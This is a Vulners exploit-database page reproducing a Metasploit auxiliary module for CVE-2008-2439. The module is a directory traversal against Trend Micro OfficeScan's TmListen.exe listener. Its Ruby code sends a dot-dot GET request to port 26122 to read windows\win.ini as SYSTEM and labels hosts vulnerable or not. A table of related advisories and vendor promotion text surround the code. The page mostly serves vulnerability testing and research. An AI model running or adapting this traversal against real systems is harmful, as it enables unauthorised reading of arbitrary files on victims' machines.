Vulners
Lucene search
TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access
🗓️ 31 Aug 2024 00:00:00Reported by aushack, Anshul Pandey, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 155 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Trend Micro OfficeScan < 7.3 Build 3172 Client Traversal Arbitrary File Access | 8 Oct 200800:00 | – | nessus |
| Trend Micro OfficeScan Client Traversal Arbitrary File Access | 8 Oct 200800:00 | – | nessus |
| Trend Micro OfficeScan Multiple CGI Module Vulnerabilities | 8 Oct 200800:00 | – | nessus |
 | CVE-2008-2439 | 29 May 201815:50 | – | circl |
 | CVE-2008-2439 | 3 Oct 200815:00 | – | cve |
 | CVE-2008-2439 | 3 Oct 200815:00 | – | cvelist |
 | TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access | 5 Jan 200905:18 | – | metasploit |
 | CVE-2008-2439 | 3 Oct 200815:07 | – | nvd |
 | Directory traversal | 3 Oct 200815:07 | – | prion |
 | Secunia Research: Trend Micro OfficeScan Directory Traversal Vulnerability | 6 Oct 200800:00 | – | securityvulns |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
'Description' => %q{
This module tests for directory traversal vulnerability in the UpdateAgent
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
via dot dot sequences in an HTTP request.
},
'References' =>
[
[ 'OSVDB', '48730' ],
[ 'CVE', '2008-2439' ],
[ 'BID', '31531' ],
[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
],
'Author' => [ 'Anshul Pandey <anshul999[at]gmail.com>', 'aushack' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(26122),
])
end
def run_host(target_host)
res = send_request_raw(
{
'uri' => '/activeupdate/../../../../../../../../../../../windows\\win.ini',
'method' => 'GET',
}, 20)
if not res
print_error("No response from server")
return
end
http_fingerprint({ :response => res })
if (res.code >= 200)
if (res.body =~ /for 16-bit app support/)
vuln = "vulnerable."
else
vuln = "not vulnerable."
end
if (res.headers['Server'])
print_status("http://#{target_host}:#{rport} is running #{res.headers['Server']} and is #{vuln}")
end
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
EPSS0.44618